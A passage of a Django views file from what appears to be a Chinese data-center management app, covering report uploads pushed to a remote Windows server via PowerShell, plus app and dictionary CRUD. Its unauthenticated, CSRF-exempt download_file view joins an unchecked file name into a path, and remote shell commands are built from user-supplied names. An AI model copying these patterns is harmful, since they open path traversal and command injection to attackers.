0\n result['data'] = '获取补取进程信息失败。'\n else:\n sp = SupplementProcess.objects.exclude(state='9').filter(primary_process_id=cp_id).last()\n if sp:\n p_id = sp.p_id\n setup_time = sp.setup_time\n update_time = sp.update_time\n p_state = sp.p_state\n start_time = sp.start_time\n end_time = sp.end_time\n progress_time = sp.progress_time\n result['data'] = {\n 'p_id': p_id,\n 'setup_time': '{:%Y-%m-%d %H:%M:%S}'.format(setup_time) if setup_time else '',\n 'update_time': '{:%Y-%m-%d %H:%M:%S}'.format(update_time) if update_time else '',\n 'p_state': p_state,\n 'start_time': '{:%Y-%m-%d %H:%M:%S}'.format(start_time) if start_time else '',\n 'end_time': '{:%Y-%m-%d %H:%M:%S}'.format(end_time) if end_time else '',\n 'progress_time': '{:%Y-%m-%d %H:%M:%S}'.format(progress_time) if progress_time else '',\n }\n else:\n result['status'] = 0\n result['data'] = '补取进程不存在。'\n\n return JsonResponse(result)\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef get_process_monitor_info(request):\n \"\"\"\n 获取取数进程信息\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n cp_id = request.POST.get('cp_id', '')\n result = {\n 'status': 1,\n 'data': ''\n }\n try:\n cp_id = int(cp_id)\n except:\n result['status'] = 0\n result['data'] = '获取补取进程信息失败。'\n else:\n try:\n pm = ProcessMonitor.objects.get(id=cp_id)\n except ProcessMonitor.DoesNotExist as e:\n result['status'] = 0\n result['data'] = '取数进程不存在。'\n else:\n source_name = pm.source.name if pm.source else ''\n source_code = pm.source.code if pm.source else ''\n # 数据源类型\n source_type = \"\"\n try:\n source_type = DictList.objects.get(id=pm.source.sourcetype).name\n except Exception as e:\n print(e)\n app_name = pm.app_admin.name if pm.app_admin else ''\n cycle_name = pm.cycle.name if pm.cycle else ''\n status = pm.status\n create_time = '{:%Y-%m-%d %H:%M:%S}'.format(pm.create_time) if pm.create_time else ''\n last_time = '{:%Y-%m-%d %H:%M:%S}'.format(pm.last_time) if pm.last_time else ''\n\n result['data'] = {\n 'source_name': source_name,\n 'source_code': source_code,\n 'source_type': source_type,\n 'app_name': app_name,\n 'cycle_name': cycle_name,\n 'create_time': create_time,\n 'last_time': last_time,\n 'status': status,\n }\n return JsonResponse(result)\n else:\n return HttpResponseRedirect(\"/login\")\n\n\n@csrf_exempt\ndef download_file(request):\n file_name = request.GET.get(\"file_name\", \"\")\n try:\n c_file_path = settings.BASE_DIR + os.sep + \"datacenter\" + os.sep + \"upload\" + os.sep + \"report_doc\" + os.sep + file_name\n file = open(c_file_path, 'rb')\n response = FileResponse(file)\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=\"{0}\"'.format(\n escape_uri_path(file_name)) # escape_uri_path()解决中文名文件\n return response\n except:\n return HttpResponseRedirect(\"/report\")\n\n\ndef report_index(request, funid):\n \"\"\"\n 报表管理\n \"\"\"\n if request.user.is_authenticated():\n errors = []\n id = \"\"\n report_type_list = []\n\n # 下拉框选项\n c_dict_index_1 = DictIndex.objects.filter(\n id=7).exclude(state='9')\n if c_dict_index_1.exists():\n c_dict_index_1 = c_dict_index_1[0]\n dict_list1 = c_dict_index_1.dictlist_set.exclude(state=\"9\")\n for i in dict_list1:\n report_type_list.append({\n \"report_name\": i.name,\n \"report_type_id\": i.id,\n })\n all_app = App.objects.exclude(state=\"9\")\n all_app_list = []\n for app in all_app:\n all_app_list.append({\n \"app_id\": app.id,\n \"app_name\": app.name,\n })\n\n # 新增/修改报表模型\n if request.method == \"POST\":\n id = request.POST.get(\"id\", \"\")\n name = request.POST.get(\"name\", \"\")\n code = request.POST.get(\"code\", \"\")\n report_type = request.POST.get(\"report_type\", \"\")\n app = request.POST.get(\"app\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n # 二进制文件数据\n my_file = request.FILES.get(\"report_file\", None)\n\n file_name = my_file.name if my_file else \"\"\n\n # 是否报表模板\n if_template = request.POST.get(\"if_template\", \"\")\n try:\n if_template = int(if_template)\n except Exception:\n pass\n\n # 报表信息组(键值对)的数量\n report_info_num = 0\n for key in request.POST.keys():\n if \"report_info_\" in key:\n report_info_num += 1\n\n try:\n id = int(id)\n except:\n raise Http404()\n\n # 新增时提示导入文件\n if not my_file and id == 0:\n errors.append(\"请选择要导入的文件。\")\n else:\n if if_contains_sign(file_name):\n errors.append(r\"\"\"请注意文件命名格式,'#\\/\"*?<>'符号文件不允许上传。\"\"\")\n else:\n file_names=file_name.split('.')\n if file_names[-1]!='cpt' and file_names[-1] != \"\":\n errors.append(r\"\"\"只能上传cpt文件。\"\"\")\n else:\n # 报表存储位置\n myfilepath = settings.BASE_DIR + os.sep + \"datacenter\" + os.sep + \"upload\" + os.sep + \"report_doc\" + os.sep + file_name\n # 判断数据库中文件存储记录\n c_exist_model = ReportModel.objects.filter(file_name=file_name).exclude(state=\"9\")\n\n # 新增时判断是否存在,修改时覆盖,不需要判断\n if c_exist_model.exists() and id == 0:\n errors.append(\"该文件已存在,请勿重复上传。\")\n else:\n if name.strip() == '':\n errors.append('报表名称不能为空。')\n else:\n if code.strip() == '':\n errors.append('报表编码不能为空。')\n else:\n if report_type.strip() == '':\n errors.append('报表类别不能为空。')\n else:\n if app.strip() == '' and if_template == 0:\n errors.append('关联应用不能为空。')\n else:\n write_tag = False\n # 新增 或者 修改(且有my_file存在) 时写入文件\n if id == 0 or id != 0 and my_file:\n # 判断请求服务器下载文件条件是否满足\n # ps_script_path/report_file_path/web_server/report_server/username/password\n rs = ReportServer.objects.first()\n if not rs:\n errors.append('报表服务器参数未配置,报表上传失败。')\n elif not rs.report_server:\n errors.append('报表服务器地址未配置,报表上传失败。')\n elif not rs.username:\n errors.append('报表服务器用户名未配置,报表上传失败。')\n elif not rs.password:\n errors.append('报表服务器密码未配置,报表上传失败。')\n elif not rs.report_file_path:\n errors.append('报表存放路径未配置,报表上传失败。')\n else:\n try:\n with open(myfilepath, 'wb+') as f:\n for chunk in my_file.chunks():\n f.write(chunk)\n except:\n errors.append('文件上传失败。')\n else:\n # 只要有文件写入,就发送请求\n # 远程执行命令,令远程windows发送请求下载文件\n pre_ps_path = os.path.join(rs.report_file_path, 'report_ps')\n ps_script_path = os.path.join(pre_ps_path, 'request.ps1')\n report_file_path = os.path.join(rs.report_file_path, file_name)\n remote_ip = rs.report_server.split(':')[0]\n remote_user = rs.username\n remote_password = rs.password\n remote_platform = \"Windows\"\n\n # 判断ps脚本是否存在\n # 若不存在,创建路径,写入文件\n ps_check_cmd = r'if not exist {pre_ps_path} md {pre_ps_path}'.format(\n pre_ps_path=pre_ps_path)\n ps_script = ServerByPara(ps_check_cmd, remote_ip, remote_user,\n remote_password, remote_platform)\n ps_result = ps_script.run(\"\")\n\n if ps_result['exec_tag'] == 1:\n errors.append(ps_result['log'])\n else:\n # 写入脚本文件\n ps_upload_cmd = 'echo param($a, $b) > %s &' % ps_script_path + \\\n 'echo $Response=Invoke-WebRequest -Uri $b >> %s &' % ps_script_path + \\\n 'echo try{ >> %s &' % ps_script_path + \\\n 'echo [System.IO.File]::WriteAllBytes($a, $Response.Content) >> %s &' % ps_script_path + \\\n 'echo }catch{ >> %s &' % ps_script_path + \\\n 'echo [System.Console]::WriteLine($_.Exception.Message) >> %s &' % ps_script_path + \\\n 'echo } >> %s &' % ps_script_path\n ps_upload = ServerByPara(ps_upload_cmd, remote_ip, remote_user,\n remote_password, remote_platform)\n ps_upload_result = ps_upload.run(\"\")\n\n if ps_upload_result['exec_tag'] == 1:\n errors.append(ps_upload_result['log'])\n else:\n # 判断报表路径是否存在\n # 若不存在,提示不存在,报表上传失败\n # 获取app_code\n app_code = \"TMP\"\n if if_template: # 模板\n app_code = \"DATACENTER_TEMPLATE\"\n else:\n try:\n cur_app = App.objects.get(id=int(app))\n app_code = cur_app.code\n except:\n pass\n\n aft_report_file_path = os.path.join(rs.report_file_path, str(app_code))\n report_check_cmd = r'if not exist {report_file_path} md {report_file_path}'.format(\n report_file_path=aft_report_file_path)\n rc = ServerByPara(report_check_cmd, remote_ip,\n remote_user,\n remote_password, remote_platform)\n rc_result = rc.run(\"\")\n\n if rc_result['exec_tag'] == 1:\n errors.append(rc_result['log'])\n else:\n # 获取本地IP\n try:\n web_server = socket.gethostbyname(\n socket.gethostname())\n except Exception as e:\n errors.append(\"获取服务器IP失败:%s\" % e)\n else:\n url_visited = r\"http://{web_server}/download_file?file_name={file_name}\".format(\n web_server=web_server, file_name=file_name)\n remote_cmd = r'powershell.exe -ExecutionPolicy RemoteSigned -file \"{0}\" \"{1}\" \"{2}\"'.format(\n ps_script_path,\n os.path.join(aft_report_file_path,\n file_name), url_visited)\n\n server_obj = ServerByPara(remote_cmd, remote_ip,\n remote_user,\n remote_password,\n remote_platform)\n result = server_obj.run(\"\")\n if result[\"exec_tag\"] == 0:\n write_tag = True\n else:\n errors.append(result['log'])\n\n if id != 0 and not my_file:\n write_tag = True\n # 远程文件下载成功\n if write_tag:\n # 新增报表模板\n if id == 0:\n all_report = ReportModel.objects.filter(\n code=code).exclude(state=\"9\")\n if all_report.exists():\n errors.append('报表编码:' + code + '已存在。')\n else:\n try:\n report_save = ReportModel()\n report_save.name = name\n report_save.code = code\n report_save.report_type = report_type\n report_save.app_id = int(app) if not if_template else None\n report_save.file_name = file_name\n report_save.sort = int(sort) if sort else None\n report_save.if_template = if_template\n\n report_save.save()\n\n if if_template == 0:\n # 关联存储报表模板信息\n if report_info_num:\n range_num = int(report_info_num / 3)\n for i in range(0, range_num):\n report_info = ReportInfo()\n report_info_name = request.POST.get(\n \"report_info_name_%d\" % (i + 1), \"\")\n report_info_default_value = request.POST.get(\n \"report_info_value_%d\" % (i + 1), \"\")\n if report_info_name:\n report_info.name = report_info_name\n report_info.default_value = report_info_default_value\n report_info.report_model = report_save\n report_info.save()\n\n id = report_save.id\n except:\n errors.append('数据异常,请联系管理员!')\n # 修改报表模板\n else:\n all_report = ReportModel.objects.filter(code=code).exclude(\n id=id).exclude(state=\"9\")\n if all_report.exists():\n errors.append('存储编码:' + code + '已存在。')\n else:\n try:\n report_save = ReportModel.objects.get(\n id=id)\n report_save.name = name\n report_save.code = code\n report_save.report_type = report_type\n report_save.app_id = int(app) if not if_template else None\n if my_file:\n report_save.file_name = file_name\n report_save.sort = int(sort) if sort else None\n report_save.if_template = if_template\n report_save.save()\n\n if if_template == 0:\n # 修改报表信息关联\n # 情况:报表信息组相对数据库中存储树,增加/减少/相同 一样\n if report_info_num:\n range_num = int(report_info_num / 3)\n current_report_info = report_save.reportinfo_set.exclude(\n state=\"9\")\n\n update_id_list = []\n for i in range(0, range_num):\n report_info_name = request.POST.get(\n \"report_info_name_%d\" % (i + 1), \"\")\n report_info_default_value = request.POST.get(\n \"report_info_value_%d\" % (i + 1), \"\")\n report_info_id = request.POST.get(\n \"report_info_id_%d\" % (i + 1), \"\")\n report_info_id = int(\n report_info_id) if report_info_id else \"\"\n\n if report_info_id:\n update_id_list.append(report_info_id)\n report_info = ReportInfo.objects.filter(\n id=report_info_id)\n if report_info.exists() and report_info_name:\n report_info = report_info[0]\n report_info.name = report_info_name\n report_info.default_value = report_info_default_value\n report_info.report_model = report_save\n report_info.save()\n else:\n report_info = ReportInfo()\n if report_info_name:\n report_info.name = report_info_name\n report_info.default_value = report_info_default_value\n report_info.report_model = report_save\n report_info.save()\n update_id_list.append(report_info.id)\n current_report_info.exclude(\n id__in=update_id_list).update(\n state=\"9\")\n\n id = report_save.id\n except Exception as e:\n errors.append(\"修改失败。\")\n else:\n errors.append('本次报表上传任务失败。')\n return render(request, 'report.html',\n {'username': request.user.userinfo.fullname,\n \"report_type_list\": report_type_list,\n \"all_app_list\": all_app_list,\n \"errors\": errors,\n \"id\": id,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef report_app_index(request, funid):\n \"\"\"\n 应用报表管理\n \"\"\"\n if request.user.is_authenticated():\n errors = []\n id = \"\"\n report_type_list = []\n adminapp = \"\"\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n adminapp = cur_fun[0].app_id\n except:\n return HttpResponseRedirect(\"/index\")\n\n # 下拉框选项\n c_dict_index_1 = DictIndex.objects.filter(\n id=7).exclude(state='9')\n if c_dict_index_1.exists():\n c_dict_index_1 = c_dict_index_1[0]\n dict_list1 = c_dict_index_1.dictlist_set.exclude(state=\"9\")\n for i in dict_list1:\n report_type_list.append({\n \"report_name\": i.name,\n \"report_type_id\": i.id,\n })\n all_app = App.objects.exclude(state=\"9\")\n all_app_list = []\n for app in all_app:\n all_app_list.append({\n \"app_id\": app.id,\n \"app_name\": app.name,\n })\n\n # 新增/修改报表模型\n if request.method == \"POST\":\n id = request.POST.get(\"id\", \"\")\n name = request.POST.get(\"name\", \"\")\n code = request.POST.get(\"code\", \"\")\n report_type = request.POST.get(\"report_type\", \"\")\n app = request.POST.get(\"app\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n # 二进制文件数据\n my_file = request.FILES.get(\"report_file\", None)\n\n file_name = my_file.name if my_file else \"\"\n\n # 报表信息组(键值对)的数量\n report_info_num = 0\n for key in request.POST.keys():\n if \"report_info_\" in key:\n report_info_num += 1\n\n try:\n id = int(id)\n except:\n raise Http404()\n\n # 新增时提示导入文件\n if not my_file and id == 0:\n errors.append(\"请选择要导入的文件。\")\n else:\n if if_contains_sign(file_name):\n errors.append(r\"\"\"请注意文件命名格式,'#\\/\"*?<>'符号文件不允许上传。\"\"\")\n else:\n file_names = file_name.split('.')\n if file_names[-1] != 'cpt' and file_names[-1] != \"\":\n errors.append(r\"\"\"只能上传cpt文件。\"\"\")\n else:\n # 报表存储位置\n myfilepath = settings.BASE_DIR + os.sep + \"datacenter\" + os.sep + \"upload\" + os.sep + \"report_doc\" + os.sep + file_name\n # 判断数据库中文件存储记录\n c_exist_model = ReportModel.objects.filter(file_name=file_name).exclude(state=\"9\")\n\n # 新增时判断是否存在,修改时覆盖,不需要判断\n if c_exist_model.exists() and id == 0:\n errors.append(\"该文件已存在,请勿重复上传。\")\n else:\n if name.strip() == '':\n errors.append('报表名称不能为空。')\n else:\n if code.strip() == '':\n errors.append('报表编码不能为空。')\n else:\n if report_type.strip() == '':\n errors.append('报表类型不能为空。')\n else:\n if app.strip() == '':\n errors.append('关联应用不能为空。')\n else:\n write_tag = False\n # 新增 或者 修改(且有my_file存在) 时写入文件\n if id == 0 or id != 0 and my_file:\n # 判断请求服务器下载文件条件是否满足\n # ps_script_path/report_file_path/web_server/report_server/username/password\n rs = ReportServer.objects.first()\n if not rs:\n errors.append('报表服务器参数未配置,报表上传失败。')\n elif not rs.report_server:\n errors.append('报表服务器地址未配置,报表上传失败。')\n elif not rs.username:\n errors.append('报表服务器用户名未配置,报表上传失败。')\n elif not rs.password:\n errors.append('报表服务器密码未配置,报表上传失败。')\n elif not rs.report_file_path:\n errors.append('报表存放路径未配置,报表上传失败。')\n else:\n try:\n with open(myfilepath, 'wb+') as f:\n for chunk in my_file.chunks():\n f.write(chunk)\n except Exception as e:\n print(e)\n errors.append('文件上传失败。')\n else:\n # 只要有文件写入,就发送请求\n # 远程执行命令,令远程windows发送请求下载文件\n pre_ps_path = os.path.join(rs.report_file_path, 'report_ps')\n ps_script_path = os.path.join(pre_ps_path, 'request.ps1')\n report_file_path = os.path.join(rs.report_file_path, file_name)\n remote_ip = rs.report_server.split(':')[0]\n remote_user = rs.username\n remote_password = rs.password\n remote_platform = \"Windows\"\n\n # 判断ps脚本是否存在\n # 若不存在,创建路径,写入文件\n ps_check_cmd = r'if not exist {pre_ps_path} md {pre_ps_path}'.format(\n pre_ps_path=pre_ps_path)\n ps_script = ServerByPara(ps_check_cmd, remote_ip, remote_user,\n remote_password, remote_platform)\n ps_result = ps_script.run(\"\")\n\n if ps_result['exec_tag'] == 1:\n errors.append(ps_result['log'])\n else:\n # 写入脚本文件\n ps_upload_cmd = 'echo param($a, $b) > %s &' % ps_script_path + \\\n 'echo $Response=Invoke-WebRequest -Uri $b >> %s &' % ps_script_path + \\\n 'echo try{ >> %s &' % ps_script_path + \\\n 'echo [System.IO.File]::WriteAllBytes($a, $Response.Content) >> %s &' % ps_script_path + \\\n 'echo }catch{ >> %s &' % ps_script_path + \\\n 'echo [System.Console]::WriteLine($_.Exception.Message) >> %s &' % ps_script_path + \\\n 'echo } >> %s &' % ps_script_path\n ps_upload = ServerByPara(ps_upload_cmd, remote_ip, remote_user,\n remote_password, remote_platform)\n ps_upload_result = ps_upload.run(\"\")\n\n if ps_upload_result['exec_tag'] == 1:\n errors.append(ps_upload_result['log'])\n else:\n # 判断报表路径是否存在\n # 若不存在,提示不存在,报表上传失败\n # 获取app_code\n try:\n cur_app = App.objects.get(id=int(app))\n except:\n write_tag = False\n errors.append('应用不存在。')\n else:\n app_code = cur_app.code\n aft_report_file_path = os.path.join(rs.report_file_path,\n str(app_code))\n report_check_cmd = r'if not exist {report_file_path} md {report_file_path}'.format(\n report_file_path=aft_report_file_path)\n\n rc = ServerByPara(report_check_cmd, remote_ip,\n remote_user,\n remote_password, remote_platform)\n rc_result = rc.run(\"\")\n\n if rc_result['exec_tag'] == 1:\n errors.append(rc_result['log'])\n else:\n # 获取本地IP\n try:\n web_server = socket.gethostbyname(\n socket.gethostname())\n except Exception as e:\n errors.append(\"获取服务器IP失败:%s\" % e)\n else:\n url_visited = r\"http://{web_server}/download_file?file_name={file_name}\".format(\n web_server=web_server, file_name=file_name)\n remote_cmd = r'powershell.exe -ExecutionPolicy RemoteSigned -file \"{0}\" \"{1}\" \"{2}\"'.format(\n ps_script_path,\n os.path.join(aft_report_file_path,\n file_name),\n url_visited)\n\n server_obj = ServerByPara(remote_cmd, remote_ip,\n remote_user,\n remote_password,\n remote_platform)\n result = server_obj.run(\"\")\n if result[\"exec_tag\"] == 0:\n write_tag = True\n else:\n errors.append(result['log'])\n\n if id != 0 and not my_file:\n write_tag = True\n\n # 远程文件下载成功\n if write_tag:\n # 新增报表模板\n if id == 0:\n all_report = ReportModel.objects.filter(\n code=code).exclude(state=\"9\")\n if all_report.exists():\n errors.append('报表编码:' + code + '已存在。')\n else:\n try:\n report_save = ReportModel()\n report_save.name = name\n report_save.code = code\n report_save.report_type = report_type\n report_save.app_id = int(app)\n report_save.file_name = file_name\n report_save.sort = int(sort) if sort else None\n report_save.save()\n\n # 关联存储报表模板信息\n if report_info_num:\n range_num = int(report_info_num / 3)\n for i in range(0, range_num):\n report_info = ReportInfo()\n report_info_name = request.POST.get(\n \"report_info_name_%d\" % (i + 1), \"\")\n report_info_default_value = request.POST.get(\n \"report_info_value_%d\" % (i + 1), \"\")\n if report_info_name:\n report_info.name = report_info_name\n report_info.default_value = report_info_default_value\n report_info.report_model = report_save\n report_info.save()\n\n id = report_save.id\n except:\n errors.append('数据异常,请联系管理员!')\n # 修改报表模板\n else:\n all_report = ReportModel.objects.filter(code=code).exclude(\n id=id).exclude(state=\"9\")\n if all_report.exists():\n errors.append('存储编码:' + code + '已存在。')\n else:\n try:\n report_save = ReportModel.objects.get(id=id)\n report_save.name = name\n report_save.code = code\n report_save.report_type = report_type\n report_save.app_id = int(app)\n if my_file:\n report_save.file_name = file_name\n report_save.sort = int(sort) if sort else None\n report_save.save()\n\n # 修改报表信息关联\n # 情况:报表信息组相对数据库中存储树,增加/减少/相同 一样\n if report_info_num:\n range_num = int(report_info_num / 3)\n current_report_info = report_save.reportinfo_set.exclude(\n state=\"9\")\n\n update_id_list = []\n for i in range(0, range_num):\n report_info_name = request.POST.get(\n \"report_info_name_%d\" % (i + 1), \"\")\n report_info_default_value = request.POST.get(\n \"report_info_value_%d\" % (i + 1), \"\")\n report_info_id = request.POST.get(\n \"report_info_id_%d\" % (i + 1), \"\")\n report_info_id = int(\n report_info_id) if report_info_id else \"\"\n\n if report_info_id:\n update_id_list.append(report_info_id)\n report_info = ReportInfo.objects.filter(\n id=report_info_id)\n if report_info.exists() and report_info_name:\n report_info = report_info[0]\n report_info.name = report_info_name\n report_info.default_value = report_info_default_value\n report_info.report_model = report_save\n report_info.save()\n else:\n report_info = ReportInfo()\n if report_info_name:\n report_info.name = report_info_name\n report_info.default_value = report_info_default_value\n report_info.report_model = report_save\n report_info.save()\n update_id_list.append(report_info.id)\n current_report_info.exclude(\n id__in=update_id_list).update(\n state=\"9\")\n\n id = report_save.id\n except Exception as e:\n errors.append(\"修改失败。\")\n else:\n errors.append('本次上传报表任务失败。')\n return render(request, 'report_app.html',\n {'username': request.user.userinfo.fullname,\n \"report_type_list\": report_type_list,\n \"all_app_list\": all_app_list,\n \"errors\": errors,\n \"id\": id,\n \"adminapp\": adminapp,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef report_data(request):\n if request.user.is_authenticated():\n result = []\n search_app = request.GET.get('search_app', '')\n\n try:\n search_app = int(search_app)\n except Exception:\n pass\n\n all_report = ReportModel.objects.exclude(state=\"9\").order_by(\"-if_template\", \"sort\")\n\n # 当前应用下的所有报表+系统模板报表\n if search_app:\n template_report = all_report.filter(if_template=1)\n app_report = all_report.filter(app_id=search_app)\n\n all_report = template_report | app_report\n\n # if search_app != \"\":\n # curadminapp = App.objects.get(id=int(search_app))\n # all_report = all_report.filter(app=curadminapp)\n\n for report in all_report:\n # 报表类型\n report_type = report.report_type\n try:\n report_type_dict_list = DictList.objects.filter(id=int(report.report_type))\n if report_type_dict_list.exists():\n report_type_dict_list = report_type_dict_list[0]\n report_type = report_type_dict_list.name\n except:\n pass\n\n report_info_list = []\n current_report_info_set = report.reportinfo_set.exclude(state=\"9\")\n if current_report_info_set.exists():\n for report_info in current_report_info_set:\n report_info_list.append({\n \"report_info_name\": report_info.name,\n \"report_info_value\": report_info.default_value,\n \"report_info_id\": int(report_info.id),\n })\n result.append({\n \"id\": report.id,\n \"name\": report.name,\n \"code\": report.code,\n \"file_name\": report.file_name,\n \"report_type\": report_type,\n \"report_type_id\": int(report.report_type) if report.report_type else \"\",\n \"app\": report.app.name if report.app else \"\",\n \"app_id\": report.app.id if report.app else \"\",\n \"report_type_num\": report.report_type,\n \"sort\": report.sort,\n \"report_info_list\": report_info_list,\n \"if_template\": report.if_template,\n })\n\n return JsonResponse({\"data\": result})\n\n\ndef report_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n report = ReportModel.objects.filter(id=id)\n\n # 修改:删除远程服务器文件\n if report.exists():\n report = report[0]\n report.state = \"9\"\n report.save()\n\n # 删除关联report_info\n report_info_set = report.reportinfo_set.exclude(state=\"9\")\n if report_info_set.exists():\n for i in report_info_set:\n i.state = \"9\"\n i.save()\n\n c_file_name = report.file_name\n the_file_name = settings.BASE_DIR + os.sep + \"datacenter\" + os.sep + \"upload\" + os.sep + \"report_doc\" + os.sep + c_file_name\n if os.path.exists(the_file_name):\n try:\n os.remove(the_file_name)\n except:\n pass\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n else:\n return HttpResponse(0)\n\n\ndef app_save(request):\n if request.user.is_authenticated():\n id = request.POST.get(\"id\", \"\")\n app_name = request.POST.get(\"app_name\", \"\")\n app_code = request.POST.get(\"app_code\", \"\")\n remark = request.POST.get(\"remark\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n work_data = []\n\n try:\n work_data = json.loads(request.POST.get(\"work_data\", \"\"))\n except:\n pass\n try:\n id = int(id)\n except:\n raise Http404()\n result = {}\n\n if app_name.strip() == '':\n result[\"res\"] = '应用名称不能为空。'\n else:\n if app_code.strip() == '':\n result[\"res\"] = '应用编码不能为空。'\n else:\n if remark.strip() == '':\n result[\"res\"] = '说明不能为空。'\n else:\n if not work_data:\n result[\"res\"] = '至少配置一个业务。'\n else:\n def save_work(app):\n wd_list = []\n for wd in work_data:\n try:\n wd_id = int(wd[0])\n except:\n work = Work()\n work.app = app\n work.name = wd[1]\n work.code = wd[2]\n work.remark = wd[3]\n if wd[4]:\n work.core = wd[4]\n if wd[5]:\n work.sort = int(wd[5])\n work.save()\n wd_list.append(work.id)\n else:\n wd_list.append(wd_id)\n try:\n work = Work.objects.get(id=wd_id)\n work.name = wd[1]\n work.code = wd[2]\n work.remark = wd[3]\n if wd[4]:\n work.core = wd[4]\n if wd[5]:\n work.sort = int(wd[5])\n work.save()\n except:\n pass\n app.work_set.exclude(id__in=wd_list).update(state='9')\n\n if id == 0:\n all_app = App.objects.filter(\n code=app_code).exclude(state=\"9\")\n if (len(all_app) > 0):\n result[\"res\"] = '存储代码:' + app_code + '已存在。'\n else:\n app_save = App()\n app_save.name = app_name\n app_save.code = app_code\n app_save.remark = remark\n app_save.sort = int(sort) if sort else None\n app_save.save()\n save_work(app_save)\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = app_save.id\n else:\n all_app = App.objects.filter(code=app_code).exclude(\n id=id).exclude(state=\"9\")\n if (len(all_app) > 0):\n result[\"res\"] = '存储代码:' + app_code + '已存在。'\n else:\n try:\n app_save = App.objects.get(id=id)\n app_save.name = app_name\n app_save.code = app_code\n app_save.remark = remark\n app_save.sort = int(sort) if sort else None\n app_save.save()\n save_work(app_save)\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = app_save.id\n except Exception as e:\n print(e)\n result[\"res\"] = \"修改失败。\"\n return JsonResponse(result)\n\n\ndef app_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n app = App.objects.get(id=id)\n app.state = \"9\"\n app.save()\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef app_index(request, funid):\n \"\"\"\n 应用管理\n \"\"\"\n if request.user.is_authenticated():\n return render(request, 'app.html',\n {'username': request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef app_data(request):\n if request.user.is_authenticated():\n result = []\n\n all_app = App.objects.exclude(state=\"9\").order_by(\"sort\").values()\n all_work = Work.objects.exclude(state='9').order_by(\"sort\").values()\n for app in all_app:\n work_list = []\n # 应用对应的所有业务\n for work in all_work:\n if app['id'] == work['app_id']:\n tmp_list = [work['id'], work['name'], work['code'], work['remark'], work['core'], work['sort']]\n work_list.append(tmp_list)\n\n result.append({\n \"id\": app['id'],\n \"name\": app['name'],\n \"code\": app['code'],\n \"remark\": app['remark'],\n \"sort\": app['sort'],\n \"works\": json.dumps(work_list, ensure_ascii=False),\n })\n return JsonResponse({\"data\": result})\n\n\ndef dictindex(request, funid):\n if request.user.is_authenticated():\n alldict = DictIndex.objects.order_by(\"sort\").exclude(state=\"9\")\n return render(request, 'dict.html',\n {'username': request.user.userinfo.fullname,\n \"alldict\": alldict, \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef dictsave(request):\n if 'dictid' in request.POST:\n result = {}\n dictid = request.POST.get('dictid', '')\n dictname = request.POST.get('dictname', '')\n dictsort = request.POST.get('dictsort', '')\n try:\n dictsort = int(dictsort)\n except:\n dictsort = 999999\n try:\n dictid = int(dictid.replace(\"dict_\", \"\"))\n except:\n raise Http404()\n if dictname.strip() == '':\n result[\"res\"] = '字典名称不能为空。'\n else:\n if dictid == 0:\n alldict = DictIndex.objects.filter(\n name=dictname).exclude(state=\"9\")\n if (len(alldict) > 0):\n result[\"res\"] = dictname + '已存在。'\n else:\n dictsave = DictIndex()\n dictsave.name = dictname\n dictsave.sort = dictsort\n dictsave.save()\n dictsave = DictIndex.objects.filter(\n name=dictname).exclude(state=\"9\")\n result[\"res\"] = \"新增成功。\"\n result[\"data\"] = dictsave[0].id\n else:\n alldict = DictIndex.objects.filter(\n name=dictname).exclude(id=dictid).exclude(state=\"9\")\n if (len(alldict) > 0):\n result[\"res\"] = dictname + '已存在。'\n else:\n try:\n dictsave = DictIndex.objects.get(id=dictid)\n dictsave.name = dictname\n dictsave.sort = dictsort\n dictsave.save()\n result[\"res\"] = \"修改成功。\"\n except:\n result[\"res\"] = \"修改失败。\"\n return HttpResponse(json.dumps(result))\n\n\ndef dictselect(request):\n if request.method == 'GET':\n result = []\n dictid = request.GET.get('dictid', '')\n try:\n dictid = int(dictid.replace(\"dict_\", \"\"))\n except:\n raise Http404()\n alldict = DictIndex.objects.get(id=dictid)\n allDictList = DictList.objects.order_by(\"sort\").filter(\n dictindex=alldict).exclude(state=\"9\")\n if (len(allDictList) > 0):\n for dict_list in allDictList:\n result.append(\n {\"id\": dict_list.id, \"name\": dict_list.name, \"sort\": dict_list.sort})\n return HttpResponse(json.dumps(result))\n\n\ndef dictlistsave(request):\n if 'dictid' in request.POST:\n result = {}\n\n listid = request.POST.get('listid', '')\n dictid = request.POST.get('dictid', '')\n listname = request.POST.get('listname', '')\n listsort = request.POST.get('listsort', '')\n\n try:\n listsort = int(listsort)\n except:\n listsort = 999999\n try:\n dictid = int(dictid.replace(\"dict_\", \"\"))\n except:\n raise Http404()\n try:\n listid = int(listid.replace(\"list_\", \"\"))\n except:\n raise Http404()\n if listname.strip() == '':\n result[\"res\"] = '条目名称不能为空。'\n else:\n alldict = DictIndex.objects.get(id=dictid)\n if listid == 0:\n\n alllist = DictList.objects.filter(\n name=listname, dictindex=alldict).exclude(state=\"9\")\n if (len(alllist) > 0):\n result[\"res\"] = listname + '已存在。'\n else:\n listsave = DictList()\n listsave.dictindex = alldict\n listsave.name = listname\n listsave.sort = listsort\n listsave.save()\n listsave = DictList.objects.filter(\n name=listname, dictindex=alldict).exclude(state=\"9\")\n result[\"res\"] = \"新增成功。\"\n result[\"data\"] = listsave[0].id\n else:\n alllist = 